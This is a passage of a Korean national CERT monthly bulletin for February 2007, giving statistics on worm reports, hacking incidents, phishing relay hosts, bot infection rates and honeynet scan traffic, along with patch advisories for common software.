*2월완결

본 보고서내 정부승인통계는 웜 바이러스 피해신고 건수, 해킹(스팸릴레이, 피싱경유지, 단순침입시도, 기타해킹, 홈페이지 변조건수)에 한하며, 침해사고 동향분석에 대한 이해를 돕기 위하여 기술된 악성봇 감염률, PC 생존시간, 허니넷 통계 등은 해당되지 않습니다. 본 보고서 내용의 전부나 일부를 인용하는 경우에는 반드시 출처 [자료 : 한국정보보호진흥원 인터넷침해사고대응지원센터]를 명시하여 주시기 바랍니다.

Contents Part 1 월간 동향 요약...1 침해사고 통계 분석 1-1. 증감 추이(전년, 전월대비)...2 1-2. 침해사고 통계 요약...2 1-3. 침해사고 통계 현황 1-4. 해킹 웜 바이러스 신고건수 추이...3 주요 웜 바이러스별 현황....4 해킹 사고 접수 처리 건수 추이...5 피해기관별분류...6 피해 운영체제별 분류....6 피싱 경유지 신고처리 현황...7 홈페이지 변조 사고처리 현황...9 악성 봇(Bot) 현황...10 Part 2 허니넷/트래픽 분석 2-1. PC 생존시간 분석...12 2-2. 허니넷 트래픽 분석 전체추이...14 Top 3 국가별 공격유형...15 해외 국내...16 국내 국내...17 2-3. 국내 인터넷망 트래픽 분석...18 2-4. 바이러스 월 탐지 웜 바이러스 정보...19 Part 3 월간특집 1. ARP Spoofing 기법을 이용한 웹 페이지 악성코드 삽입 사례...20 2. Trojan (cctv.exe) 위험성 분석....32 <별첨> 악성코드 유포지/경유지 조기 탐지 및 차단 조치...43 <부록> 주요포트 별 서비스 및 관련 악성코드...45 <용어정리>....46 -Ⅰ-

표차례 [표 1] 월간 침해사고 전체 통계....2 [표 2] 월별 국내 웜 바이러스 신고 건수...3 [표 3] 주요 웜 바이러스 신고현황...4 [표 4] 해킹사고 처리 현황...5 [표 5] 해킹사고 피해 기관별 분류...6 [표 6] 해킹사고 피해 운영체제별 분류...6 [표7]피싱경유지신고건수...7 [표 8] 홈페이지 변조 사고처리 현황...9 [표 9] 국내 악성 봇(Bot) 감염률...10 [표 10] 악성 Bot의 전파에 이용되는 주요 포트 목록...11 [표 11] 윈도우즈 XP Pro SP1, 윈도우즈 2000 Pro SP4 생존가능시간...12 [표 12] 허니넷에 유입된 스캔 트래픽 국가별 비율...15 [표 13] 해외 국내(허니넷) 스캔탐지 현황...16 [표 14] 국내 국내(허니넷) 스캔탐지 현황....17 [표 15] 수집된 주요 웜 바이러스 현황....19 그림 차례 (그림 1) 월별 침해사고 전체 통계 그래프...2 (그림 2) 월별 국내 웜 바이러스 신고 건수...3 (그림 3) 해킹사고 접수 처리 건수 유형별 분류...5 (그림 4) 해킹사고 피해 기관별 분류...6 (그림 5) 월별 피싱 경유지 신고건수....7 (그림 6) 월별 홈페이지 변조 사고처리 현황...9 (그림 7) 월별 국내 악성 봇(Bot) 감염률 추이...10 (그림 8) 전 세계 악성 봇(Bot) 감염 IP 수와 국내 감염 IP 수의 비교...10 (그림9)악성봇관련포트비율(해외)...11 (그림 10)악성봇관련포트비율(국내)...11 (그림 11) 월별 평균 생존 가능시간 변동 추이...12 (그림 12) Windows XP SP1 생존시간 분포 분석...13 (그림 13) Windows 2000 SP4 생존시간 분포 분석...13 (그림 14)월별허니넷유입트래픽규모...14 (그림 15) 허니넷 유입 트래픽 Top3 국가별 공격유형...15 (그림 16) 해외 국내(허니넷) 스캔탐지 현황...16 (그림 17) 국내 국내(허니넷) 스캔탐지 현황...17 (그림 18) 국내 인터넷망에 유입된 특정포트 일별 추이...18 (그림 19) 국내 인터넷망에 유입된 공격유형...18 -Ⅱ-

월간 동향 요약 핫이슈 악성코드 은닉 페이지를 쉽게 찾아낼 수 없도록 위장하는 신종 악성코드 은닉기법(ARP 스푸핑) 및 이를 이용한 악성코드 은닉사이트가 대량으로 발견되어 긴급 차단조치 하였으나, 갈수록 지능화되어 가는 악성코드 은닉기법에 의한 악성코드 감염피해를 예방하기 위하여 인터넷 사용자는 최신 윈도우 보안업데이트를 적용하고, 주기적으로 PC를 백신프로그램으로 점검하는 습관이 필요(월간특집 참고) 주요 취약점, 웜 바이러스 제목 영향받는 제품/사용자 영향력/예방 및 대책 참고 사이트 MS Office 원격코드 실행 취약점으로 인한 피해 주의 MS Office 2000, XP, 2003, 2004 for MAC - 최신 윈도우 보안업데이트 적용 - 출처가 불분명한 이메일과 메신저로 첨부되는 MS Office 문서 파일에 대한 열람 자제 http://www.microsoft.com /korea/technet/security /bulletin/ms07-015.mspx 곰플레이어 업그레이드 보안권고 곰플레이어 2.1.0.3395 이하 - 출처가 불분명한 이메일과 메신저로 첨 부되는 파일에 대한 열람 자제 - 백신프로그램의 최신 업데이트 및 실시 간 감시기능을 활성화시킴 http://secunia.com /advisories/23994 http://gom.ipop.co.kr/notice /view.html?intseq=54 아래한글 제품군 보안업데이트 권고 한글 2005 (버전 6.7.6.1008 미만) 한글 2007 단품 (버전 7.0.3.253 미만) 등 - 최신 한글 업데이트 적용 - 출처가 불분명한 이메일과 메신저로 첨부되는 파일에 대한 열람 자제 - 백신프로그램의 최신 업데이트 및 실 시간 감시기능을 활성화시킴 http://www.haansoft.com/ hnc5_0/haansoft/main_notice/ announce.php?mode=read& tbl=haan01_b00003&no=181 보안 공지사항에 대한 보다 자세한 내용은 KISA 인터넷침해사고대응지원센터 홈페이지 공지사항 (http://www.krcert.or.kr/ 보안정보 보안공지) 에서 확인할 수 있습니다. 통계 분석 웜 바이러스 피해신고는 전월에 비하여 20.1% 증가 해킹신고 처리는 전월 대비 1.4% 증가 (스팸릴레이, 피싱경유지는 각각 20.2%, 97.7% 증가, 단순 침입시도, 기타해킹, 홈페이지변조는 각각 43.7%, 10.0%, 48.4% 감소) - 피싱경유지의 경우 국외 특정 은행에 대한 경유지 신고 증가에 따라 전월에 비하여 증가함 전 세계 Bot 감염 PC 대비 국내 Bot 감염 PC 비율 13.0%로 전월대비 0.7%p 감소 PC 생존시간 Windows XP SP1 : 16분47초 (전월대비 1분28초 증가 ) Windows 2000 SP4 : 21분32초 (전월대비 1분42초 증가 ) 인터넷 침해사고 동향 및 분석 월보 1

Part 1 침해사고 통계분석 Part 2 Part 3 1. 침해사고 통계분석 1-1. 증감 추이(전년, 전월대비) 구분 웜 바이러스 해킹신고처리 스팸릴레이 피싱경유지 단순침입시도 기타해킹 홈페이지 변조 악성 봇(Bot) 통계 요약 총 622건 : 전월( 518건)대비 20.1% 증가 총 2,189건 : 전월(2,158건)대비 1.4% 증가 총 1,473건 : 전월(1,225건)대비 20.2% 증가 총 178건 : 전월( 90건)대비 97.7% 증가 총 184건 : 전월( 327건)대비 43.7% 감소 총 206건 : 전월( 229건)대비10.0% 감소 총 148건 : 전월( 287건)대비 48.4% 감소 전 세계 Bot감염 추정PC 대비 국내감염율은 13.0%로 전월(13.7%)대비 0.7%p 감소 1-2. 침해사고 통계 요약 구분 웜 바이러스 [표 1] 월간 침해사고 전체 통계 2006 2007 2007 총계 1 2 3 4 5 6 7 8 9 10 11 12 7,789 518 622 해킹신고처리 26,808 2,158 2,189 스팸릴레이 14,055 1,225 1,473 피싱경유지 1,266 90 178 단순침입시도 3,711 327 184 기타해킹 4,570 229 206 홈페이지 변조 3,206 287 148 봇(Bot) 12.5% 13.7% 13.0% 총계 1,140 4,347 2,698 268 511 435 435 13.4% 웜 바이러스 신고 접수건수 스팸릴레이 신고 처리건수 피싱 경유지 신고 처리건수 1,400 1.200 1,000 800 600 400 200 0 2,000 1,500 1,000 500 0 200 160 120 80 40 0 단순침입시도+기타해킹신고 처리 홈페이지 변조사고 처리건수 악성 Bot 감염비율 2,000 1,500 1,000 500 0 1,000 800 600 400 200 0 30% 20% 10% 0 (그림 1) 월별 침해사고 전체 통계 그래프 2 2007년 2월호

www.krcert.or.kr 1-3. 침해사고 통계 현황 웜 바이러스 신고건수 추이 [표 2] 월별 국내 웜 바이러스 신고 건수 구분 2006 총계 2007 2007 1 2 3 4 5 6 7 8 9 10 11 12 신고건수 7,789 518 622 1,140 웜 바이러스 신고건수는 KISA, ㄜ안철수연구소, ㄜ하우리가 공동으로 집계한 결과임 총계 1,400 1,200 1,000 800 600 400 200 0 (그림 2) 월별 국내 웜 바이러스 신고 건수 07년 2월에 국내 백신업체와 KISA에 신고된 웜 바이러스 신고건수는 622건으로 전월(518건)에 비하여 20.1% 증가하였다. - 2월에는 지난달에 1, 2위를 차지했던 BAGLE, BAGZ 등 특정 웜 바이러스에 의한 피해신고가 많았던 것과 달리 AGENT, DOWNLOAD, XEMA, HUPIGON 등 다양한 웜 바이러스에 의한 피해신고가 고루 접수되었던 것으로 나타났다. 인터넷 침해사고 동향 및 분석 월보 3

Part 1 침해사고 통계분석 Part 2 Part 3 주요 웜 바이러스별 현황 [표 3] 주요 웜 바이러스 신고현황 2007 순위 1 2 3 4 5 6 명칭 건수 명칭 건수 명칭 건수 명칭 건수 명칭 건수 명칭 건수 1 BAGLE 2 BAGZ 3 BANLOAD 4 DOWNLOADER 5 IRCBOT 6 VIKING 7 PARITE 8 XEMA 9 DELLBOY 10 LINEAGEHACK 기타 합계 150 AGENT 136 DOWNLOADER 32 XEMA 19 HUPIGON 15 LINEAGEHACK 15 KORGAMEHACK 14 QQPASS 13 GRAYBIRD 13 BAGLE 10 IRCBOT 101 기타 518 73 64 45 44 27 26 17 15 14 13 284 622 07년 2월에 신고된 웜 바이러스를 명칭별로 분류한 결과 AGENT에 의한 피해가 가장 많았고 다 음으로 DOWNLOADER, XEMA 변종 웜 바이러스에 의한 피해신고가 많았던 것으로 나타났다. - 1위를 차지한 AGENT 변종 웜 바이러스는 자체 전파력 없이 메일, 메신저, 게시판, 자료실에 서 첨부파일 형태로 전파되며, 감염된 시스템은 특정사이트에 접속하여 또 다른 악성코드 파일 을 다운로드 받는 것으로 알려져 있다. 4 2007년 2월호

www.krcert.or.kr 1-4. 해킹 해킹 사고 접수 처리 건수 추이 [표 4] 해킹사고 처리 현황 구분 2006 2007 2007 총계 1 2 3 4 5 6 7 8 9 10 11 12 총계 스팸릴레이 피싱경유지 단순침입시도 기타해킹 홈페이지변조 14,055 1,266 3,711 4,570 3,206 1,225 90 327 229 287 1,473 178 184 206 148 2,698 268 511 435 435 합계 26,808 2,158 2,189 4,347 피싱(Phishing) 경유지 신고 건수는 KISA가 국외의 침해사고대응기관이나 위장사이트의 대상이 된 기관 또는 업체, 일반사용자로부터 신고 받아 처리한 건수로써 실제 피싱으로 인한 피해 사고건수가 아니라 보안이 취약한 국내 시스템이 피싱 사이트 경유지로 악용되어 신고된 건수임 67.3% 8.1% 8.4% 9.4% 6.8% 스팸릴레이 피싱경유지 단순침입시도 기타해킹 홈페이지 변조 (그림 3) 해킹사고 접수 처리 건수 유형별 분류 07년.2월 KISA에서 처리한 해킹사고는 2,189건으로 전월(2,158건) 대비 1.4% 증가 하였다. - 해킹사고 항목별 증감을 파악한 결과 스팸릴레이, 피싱경유지는 각각 20.2%, 97.7% 증가, 단순 침입시도, 기타해킹, 홈페이지변조는 각각 43.7%, 10.0%, 48.4% 감소한 것으로 나타났다. - 이번 달에는 피싱경유지 사고신고 건수가 증가하면서 가장 많은 비율을 차지하였는데, 국외 특 정 은행에 대한 피싱경유지 신고가 증가하였기 때문이다. 인터넷 침해사고 동향 및 분석 월보 5

Part 1 침해사고 통계분석 Part 2 Part 3 피해 기관별 분류 [표 5] 해킹사고 피해 기관별 분류 기관 2006 2007 2007 총계 1 2 3 4 5 6 7 8 9 10 11 12 총계 기업 대학 비영리 연구소 네트워크 기타(개인) 합계 3,689 1,094 714 16 307 20,988 435 95 46 1 27 1,554 241 75 33 0 11 1,829 26,808 2,158 2,189 기관 분류기준 : 기업(co, com), 대학(ac), 비영리(or, org), 연구소(re), 네트워크(ne, net), 기타(pe 또는 ISP에서 제공하는 유동 IP 사용자) 676 170 79 1 38 3,383 4,347 피해 기관별 분류 결과는 전월과 동일하게 기타(개 인), 기업, 대학, 비영리의 순으로 나타났다. 피해 비율이 83%로 가장 높은 비율을 나타낸 기타(개 기업 11% 대학 3% 네트워크 1% 인)는 침해사고관련 IP가 주로 ISP에서 제공하는 유동 IP(주로 개인용 컴퓨터)인 경우를 의미하며, 기업의 경우 홈페이지변조, 단순침입시도 피해 감 개인 83% 비영리 2% 소에 따라 전체 피해건수가 감소하였다. 피해 운영체제별 분류 [표 6] 해킹사고 피해 운영체제별 분류 (그림 4) 해킹사고 피해 기관별 분류 운영체제 2006 2007 2007 총계 1 2 3 4 5 6 7 8 9 10 11 12 총계 Windows 22,193 1,868 1,980 Linux 3,616 200 148 Unix 48 0 2 기타 951 90 59 합계 26,808 2,158 2,189 운영체제별 분류 자료는 각 운영체제의 안전성과는 상관관계가 없으며, 단지 신고에 따른 분석 자료임 3,848 348 2 149 4,347 해킹신고 처리결과를 운영체제별로 분류한 결과는 전월과 마찬가지로 Windows, Linux 운영체제 순이었다. 신고 처리결과중 Windows 운영체제가 차지하는 비율은 90.4% 였으며, Linux는 6.7% 이었다. 전체 피해 기관 중 windows 시스템을 주로 사용하는 기타(개인)의 피해건수가 가장 많아 windows 운영체제에 대한 피해가 가장 높았 고, 홈페이지변조 사고가 대부분인 Linux의 경우 홈페이지변조 사고 감소에 따라 사고 건수가 같이 감소하였다. 6 2007년 2월호

www.krcert.or.kr 피싱 경유지 신고처리 현황 [표 7] 피싱 경유지 신고 건수 2006 2007 2007 구분 총계 1 2 3 4 5 6 7 8 9 10 11 12 총계 피싱경유지 신고건수 1,266 90 178 268 피싱(Phishing) 경유지 신고 건수는 KISA가 국외의 침해사고대응기관이나 위장사이트의 대상이 된 기관 또는 업체, 일반사용자로부터 신고 받아 처리한 건수로서 실제 피싱으로 인한 피해 사고건수가 아니라 보안이 취약한 국내 시스템이 피싱 사이트 경유지로 악용되어 신고된 건수임 200 160 120 80 40 0 이번달 피싱 경유지 신고건수는 총 178건으로, 전월(90건)대비 88건이 증가하였다. 증가원인은 지난 1월에는 한달 동안 4건에 불과했던 미국의 WellsFargo은행 피싱사이트 신고건이 이달에는 1일~7일 사이 96건이나 신고되었기 때문이다. 신고내용 분석결과 신고된 대부분의 IP는 개인사용자와 PC방 등에 할당된 것으로, 피싱 경유지 대 상 시스템을 일반적인 서버시스템이 아닌 PC를 대상으로 하였으며, 보안이 취약한 여러 대의 윈도 우즈 PC를 해킹하거나 악성코드에 감염시킨 뒤 동적 DNS서비스를 통해 피싱 경유지로 사용했기 때문에 사고건수가 많았던 것으로 추정된다. 따라서 개인 사용자들은 피싱 경유지사이트로 악용되 지 않도록 PC보안을 더욱 철저히 하여야 한다. 피싱 대상기관 유형으로는 이달에도 금융기관이 큰 비중을 차지하였다. 기관별로는 WellsFargo은 행(97건)이 가장 많았으며, 그 뒤를 이어 전자상거래 유형인 PayPal(22건), ebay(14건)등의 순 으로 나타났다. 기관 금융기관 전자상거래 기타 합계 건수 163 15 0 178 (그림 5) 월별 피싱 경유지 신고건수 전자상거래 8.4% 금융기관 91.6% 인터넷 침해사고 동향 및 분석 월보 7

Part 1 침해사고 통계분석 Part 2 Part 3 피싱 대상기관 및 신고건수를 국가별로 분류한 결과, 총 6개국 22개 기관으로 집계되었다. 미국이 15 개(68.2%) 기관, 신고건수 168건(94.4%)을 차지하여, 이달에도 전월과 동일하게 국내 신고건의 대부분을 미국이 차지하였음을 알 수 있다. 구분 기관 분류 기관수 신고건수 금융기관 13 153 미국 전자상거래 2 15 168 기타 0 0 독일 금융기관 2 4 영국 2 2 아르헨티나 1 2 캐나다 홍콩 총6개국 - 1 1 22 1 1 178 피싱 경유지로 악용된 국내 사이트를 기관유형별로 분류한 결과, 기업 20건(11.2%), 개인/기타 14건 (7.9%), 교육 9건(5.1%), 비영리 7건(3.9%) 등의 순으로 집계되었으며, 홈페이지가 없거나 Whois 정보 에 ISP 관리대역으로만 나와 연락처를 확인할 수 없는 경우에 해당되는 ISP서비스이용자 유형이 128건(71.9%)으로 나타났다. 기관유형 기업 건수 20 기업 11.2% 교육 5.1% 비영리 3.9% 교육 9 비영리 개인/기타 7 14 ISP 서비스 71.9% ISP서비스이용자 합계 128 178 개인/기타 7.9% 피싱 경유지 시스템에서 이용된 포트는 이달에도 표준 HTTP포트인 80포트를 이용한 경우가 170건 (95.0%)으로 지난달 80포트 비율(85.6%)에 비해 약 10%가 증가하였다. 포트 건수 80 82 84 85 443 8080 170 2 3 1 1 1 80 포트 82 포트 84 포트 85 포트 443 포트 8080 포트 80 포트 95.0% 합계 178 8 2007년 2월호

www.krcert.or.kr 홈페이지 변조 사고처리 현황 [표 8] 홈페이지 변조 사고처리 현황 구분 2006 총계 피해홈페이지 수 3,206 피해시스템 수 1,047 2007 2007 1 2 3 4 5 6 7 8 9 10 11 12 287 95 148 80 피해시스템 수는 피해 IP 수를 기준으로 산정한 것으로 단일 IP에 수십~수백 개의 홈페이지를 운영하는 경우도 있으므로 피해홈페이지 수는 피해시스템 수 보다 많을 수 있음 총계 435 175 500 400 300 200 100 0 (그림 6) 월별 홈페이지 변조 사고처리 현황 이번 달에는 80개 시스템(IP)의 148개 사이트(도메인)에 대한 홈페이지 변조가 발생하여 피해시스템 수는 전월(95개) 대비 15.7% 감소하였고, 피해홈페이지 수는 전월(287개) 대비 48.4% 감소한 것 으로 나타났다. - 낮은 버전(ver 4.1 pl8 이하)의 무료 웹 게시판 S/W(제로보드)를 운영하는 웹 호스팅업체에서 최신버전으로 업그레이드하여, 피해 건수가 전월에 비하여 감소하였으나, 여전히 낮은 버전으로 운영하는 업체가 존재하여 피해가 지속적으로 발생하고 있으므로, 해당 게시판 S/W를 구동중인 웹 사이트 관리자들은 최신버전(제로보드 5)으로 업그레이드하기를 권장한다. 참고 사이트 제로보드 5 다운로드 : www.zeroboard.com 웹 어플리케이션 보안템플릿 : http://www.krcert.or.kr 초기화면 왼쪽 웹어플리케이션보안템플릿 ModSecurity를 이용한 아파치 웹서버 보안 : http://www.krcert.or.kr 보안정보 기술문서 ModSecurity를 이용한 아파치 웹서버 보안 WebKnight를 이용한 SQL Injection 공격 차단 : http://www.krcert.or.kr 보안정보 기술문서 WebKnight를 이용한 SQL Injection 공격 차단 인터넷 침해사고 동향 및 분석 월보 9

Part 1 침해사고 통계분석 Part 2 Part 3 악성 봇(Bot) 현황 [표 9] 국내 악성 봇(Bot) 감염률 구분 2006 평균 2007 2007 1 2 3 4 5 6 7 8 9 10 11 12 국내 비율 12.5% 13.7% 13.0% 13.4% 전 세계 Bot 감염 추정 PC 중 국내 Bot 감염 PC가 차지하는 비율임 봇(Bot) : 운영체제 취약점, 비밀번호 취약성, 웜 바이러스의 백도어 등을 이용하여 전파되며, 명령 전달사이트와의 백도어 연결 등을 통하여 스팸메일 전송이나 DDoS 공격에 악용 가능한 프로그램 또는 실행가능한 코드 평균 25% 20% 15% 10% 5% 0 (그림 7) 월별 국내 악성 봇(Bot) 감염률 추이 100,000 80,000 60,000 40,000 20,000 0 (그림 8) 전 세계 악성 봇(Bot) 감염 IP 수와 국내 감염 IP 수의 비교 10 2007년 2월호

www.krcert.or.kr 전 세계 Bot 감염추정 PC 중에서 국내 감염 PC 비율은 13.0%로 지난달에 비해 0.7%p 감소하였다. 지난달에 감염 시도 트래픽이 많았던 TCP/2967 포트 트래픽이 감소하여 Bot 감염률이 감소되었다. - Bot의 전파에 사용되는 주요 포트는 NetBIOS 관련 포트인 TCP/445, TCP/139, TCP/135 와 웹 관련 TCP/80 포트, MS-SQL 관련 포트인 TCP/1433 등으로 지난달 Top5를 차지한 포트들 이 그대로 주요 포트로 사용되고 있다. (그림 9) 전월 악성 Bot Top5 포트 : TCP/445, TCP/139, TCP/80, TCP/135, TCP/1433 TCP/445 TCP/139 TCP/80 TCP/135 TCP/1433 기타 TCP/139 TCP/80 TCP/1433 TCP/135 TCP/2967 기타 10.2% 7.8% 7.9% 32.1% 15.1% 10.8% 5.8% 34.3% 19.8% 22.2% 14.6% 19.4% (그림 9) 악성봇 관련 포트 비율(해외) (그림 10) 악성봇 관련 포트 비율(국내) [표 10] 악성 Bot의 전파에 이용되는 주요 포트 목록 포트 관련 취약점 및 웜/악성 Bot 포트 관련 취약점 및 웜/악성 Bot 23 Cisco Telnet 2967 Symantec Exploit 80 WebDAV, ASN.1-HTTP, Cisco HTTP 2745 Bagle, Bagle2 135 DCOM, DCOM2 3127 MyDoom 139 NetBIOS, ASN.1-NT 3140 Optix 143 IMail 5000 UPNP 445 NetBIOS, LSASS, WksSvc, ASN.1-SMB, DCOM 6101 Veritas Backup Exec 903 NetDevil 6129 Dameware 1025 DCOM 17300 Kuang2 1433 MS-SQL 27347 Sub7 인터넷 침해사고 동향 및 분석 월보 11

Part 1 Part 2 허니넷/트래픽 분석 Part 3 2. 허니넷/트래픽 분석 2-1. PC 생존시간 분석 2월 평균생존가능 시간은 WindowsXP SP1는 16분47초, Windows2000 SP4는 21분32초로 측정 되었다. 전월에 비하여 WindowsXP SP1는 1분28초 Windows 2000 SP4는 1분42초 증가하였다. - 생존시간이 전월에는 큰 폭으로 감소하였으나, 금월에 XP SP1, 2K SP4 두 운영체제에서 모두 다소 증가하는 경향을 보였다. 생존시간의 증가 폭이 크지 않으므로 웜의 전파활동 추이에 큰 변 화는 없는 것으로 추정된다. 사용자는 웜 감염을 방지하기 위하여 추측하기 어려운 윈도우 암호 를 설정하고 사전에 패치를 적용하여야 한다. 생존시간의 측정은 암호설정 및 보안 업데이트를 하지 않고, 모든 포트가 열려있는 전용선 인터넷 환경에서 Windows XP SP1과 Windows 2000 SP4 2개군으로 분류하여 1000 여회를 실시하였다. WinXP SP2는 개인방화벽이 기본으로 설치되므로 웜 감염피해를 상당부분 예방할 수 있음 생존가능시간 : 취약한 시스템이 인터넷에 연결된 상태에서 웜이나 악성코드에 감염될 때까지의 시간 60min 50min 40min 30min 20min 10min 0 (그림 11) 월별 평균 생존 가능시간 변동 추이 [표 11] 윈도우즈 XP Pro SP1, 윈도우즈 2000 Pro SP4 생존가능시간 Windows XP SP1 구분 Windows 2000 SP4 최장 최단 평균 최장 최단 평균 1 2 217 08 418 25 5 4 15 19 16 47 317 20 363 41 5 8 19 50 21 32 2007 3 4 5 6 7 8 9 10 11 12 12 2007년 2월호

www.krcert.or.kr Min 2.000 1,500 1,000 500 0 5 10 15 20 25 Day (그림 12) WindowsXP SP1 생존시간분포분석 Min 2.000 1,500 1,000 500 0 5 10 15 20 25 Day (그림 13) Windows2000 SP4 생존시간분포분석 인터넷 침해사고 동향 및 분석 월보 13

Part 1 Part 2 허니넷/트래픽 분석 Part 3 2-2. 허니넷 트래픽 분석 전체 추이 이번 달 KISC 1) 허니넷에 유입된 전체 유해 트래픽은 약 990만 건이었으며, 이를 IP 소재별로 분류한 결과 국내 소재 IP로부터 유발된 트래픽은 전체의 62%였으며, 해외 소재 IP로부터의 트래픽은 38%를 차지한 것으로 나타났다. 허니넷에 유입되는 트래픽은 웜 바이러스, 악성 봇 등에 의한 감염 시도 트래픽(취약점 스캔)이 가장 많으며 이러한 악성코드의 네트워크스 캔은 유효한 네크워크에 대한 접근효율을 높이기 위하여, 1차적으로 감염된 시스템의 IP주소의 A, B클래스를 고정하고 C또는 D클래스 주 소를 변경하면서 스캔하는 경우가 대부분이기 때문에 일반적으로 자국에서 유발된 유해트래픽이 해외에서 유입된 트래픽보다 많음 1) KISC - Korea Internet Security Center(인터넷침해사고대응지원센터) 1,500 만 1,200 만 900 만 600 만 300 만 0 (그림 14) 월별 허니넷 유입 트래픽 규모 참고 : 허니넷 으로 유입되는 트래픽은 초당 수백 건 이상이 될 수 있으므로 구체적인 건수는 큰 의미가 없으며, 국내외 비율 및 월별증감을 참고하기 바람 14 2007년 2월호

www.krcert.or.kr Top 3 국가별 공격 유형 허니넷에 유입된 트래픽의 근원지 IP소재 국가별로 분석한 결과 전월과 동일하게 중국으로부터 유입 된 트래픽이 가장 많았으며, 다음으로 미국, 일본 순이었다. 국가별 가장 많이 이용된 포트도 전월과 동 일하여 중국발 트래픽은 TCP/22 포트에 대한 서비스 스캔(포트스캔)이 가장 많았으며, 미국발, 일본 발 트래픽은 Nmap, Advanced IP Scanner와 같은 네트워크 스캐너 도구에 의한 ICMP 스캔이 가 장 많았던 것으로 나타났다. 5% 14% CHINA 16% 30% 35% TCP/22-tcp service scan TCP/1433-tcp service scan TCP/42-tcp service scan TCP/4899-tcp service scan 기타 JAPAN 64% 17% 6% 6% ICMP-icmp ping Nmap scan TCP/22-tcp service scan TCP/10000-tcp service scan TCP/445-tcp service scan 기타 5% 22% 9% 16% USA 48% ICMP-icmp ping Nmap scan TCP/22-tcp service scan UDP/135-udp service scan TCP/10000-tcp service scan 기타 (그림 15) 허니넷 유입 트래픽 Top3 국가별 공격유형 [표 12] 허니넷에 유입된 스캔 트래픽 국가별 비율 순위 1 2 3 4 5 6 7 8 9 10 2007 1 2 3 4 5 6 국가명 비율(%) 국가명 비율(%) 국가명 비율(%) 국가명 비율(%) 국가명 비율(%) 국가명 비율(%) 중국 미국 일본 유럽연합 대만 독일 체코 공화국 영국 홍콩 이탈리아 기타 39.5 28.5 5.5 3.8 3.2 2.7 1.5 1.5 1.2 1.0 11.6 중국 47.3 미국 16.6 일본 5.6 대만 2.9 유럽연합 2.6 베니수엘라 2.4 독일 2.2 인도 2.1 불가리아 2.0 호주 1.4 기타 14.9 인터넷 침해사고 동향 및 분석 월보 15

Part 1 Part 2 허니넷/트래픽 분석 Part 3 해외 국내 해외로부터 KISC 허니넷에 유입된 트래픽을 국가 구분 없이 포트/공격(스캔)유형별로 분석한 결 과 TCP/22번 서비스스캔이 가장 많았으며, Nmap 네크워크 스캔 도구를 이용한 Ping 2) 스캔이 다음으로 많았던 것으로 나타났다. 2) Ping - 지정된 IP 주소 통신 장비의 접속성을 확인하기 위한 명령, 대상이 되는 장비가 가동하고 있는지, 통신망이 연결되어 있는지의 여부를 확인할 때 이용된다. 통신 규약으로는 인터넷 제어 메시지 프로토콜(ICMP)을 사용한다. [표 13] 해외 국내(허니넷) 스캔탐지 현황 순위 1 2 3 4 5 6 7 8 9 10 1월 2월 3월 프로토콜 / 프로토콜 / 프로토콜/ 공격유형 비율(%) 포트번호 공격유형 비율(%) 포트번호 포트번호 공격유형 비율(%) ICMP icmp ping Nmap scan 30.5 TCP/22 tcp service scan 27.3 TCP/22 tcp service scan 18.8 ICMP icmp ping Nmap scan 21.9 TCP/1433 tcp service scan 12.3 TCP/1433 tcp service scan 16.1 ICMP icmp ping Advanced IP Scanner v1.4 7.0 TCP/42 tcp service scan 6.8 TCP/42 tcp service scan 3.9 ICMP icmp ping Advanced IP Scanner v1.4 4.8 ICMP icmp ping Superscan4 scan 3.5 TCP/4899 tcp service scan 3.0 TCP/4899 tcp service scan 3.1 ICMP icmp ping Superscan4 scan 2.8 TCP/8080 tcp service scan 2.7 TCP/139 tcp service scan 2.2 TCP/2967 tcp service scan 2.3 TCP/8080 tcp service scan 2.1 UDP/135 udp service scan 2.3 TCP/10000 tcp service scan 2.0 기타 13.5 기타 11.0 TCP/22-tcp service scan ICMP-icmp ping Nmap scan TCP/1433-tcp service scan TCP/42-tcp service scan 기타 27.9% 27.3% 6.8% 16.1% 21.9% (그림 16) 해외 국내 (허니넷) 스캔탐지 현황 16 2007년 2월호

www.krcert.or.kr 국내 국내 국내에서 KISC 허니넷에 유입된 트래픽을 포트/공격(스캔)유형별로 분석한 결과 전월과 동일하게, TCP/135 스캔이 가장 많았으며, TCP/139, TCP/1433번 포트스캔이 그 뒤를 이었다. 3개 포트 모두 Bot 전파에 이용되는 포트로 여전히 Bot 스캔이 지속되고 있음을 알 수 있다. [표 14] 국내 국내(허니넷) 스캔탐지 현황 순위 1 2 3 4 5 6 7 8 9 10 1월 2월 3월 프로토콜 / 프로토콜 / 프로토콜/ 공격유형 비율(%) 포트번호 공격유형 비율(%) 포트번호 포트번호 공격유형 비율 TCP/135 tcp service scan 43.7 TCP/135 tcp service scan 46.3 TCP/1433 tcp service scan 13.1 TCP/139 tcp service scan 15.0 TCP/139 tcp service scan 12.7 TCP/1433 tcp service scan 13.3 ICMP icmp ping Nmap scan 9.9 ICMP icmp ping Nmap scan 7.9 TCP/445 tcp service scan 5.9 TCP/445 tcp service scan 5.4 TCP/22 tcp service scan 3.4 TCP/22 tcp service scan 3.5 TCP/2967 tcp service scan 3.2 TCP/1434 worm slammer 1.5 TCP/5900 tcp service scan 0.9 TCP/2967 tcp service scan 0.9 UDP/500 udp service scan 0.7 TCP/5900 tcp service scan 0.6 TCP/8080 tcp service scan 0.6 TCP/8080 tcp service scan 0.6 기타 6.1 기타 5.0 TCP/135-tcp service scan TCP/139-tcp service scan TCP/1433-tcp service scan ICMP-icmp ping Nmap scan 기타 17.5% 7.9% 46.3% 13.3% 15.0% (그림 17) 국내 국내 (허니넷) 스캔탐지 현황 인터넷 침해사고 동향 및 분석 월보 17

Part 1 Part 2 허니넷/트래픽 분석 Part 3 2-3. 국내 인터넷망 트래픽 분석 KISC 허니넷에서 탐지된 Top3 포트 비율을 국내 ISP의 일부구간에서 수집된 트래픽에서 파악한 결과 TCP/139번 포트관련 트래픽이 지속적으로 많았으며, TCP/1433 트래픽의 경우 일시적인 증가 현상을 확인할 수 있었고, TCP/135번 포트 트래픽이 그 다음 순으로 나타났다. PPS 6,500 6,000 5,500 5,000 4,500 4,000 3,500 3,000 2,500 2,000 1,500 1,000 500 0 ISP업계 : 프로토콜 / 포트 추이 (그림 18) 국내 인터넷망에 유입된 특정포트 일별 추이 TCP/139 TCP/1433 TCP/135 02/01 18:00 02/02 05:00 02/02 16:00 02/03 03:00 02/03 14:00 02/04 01:00 02/04 12:00 02/04 23:00 02/05 10:00 02/05 21:00 02/06 08:00 02/06 17:00 02/07 06:00 02/07 17:00 02/08 04:00 02/08 15:00 02/09 02:00 02/09 13:00 02/10 00:00 02/10 11:00 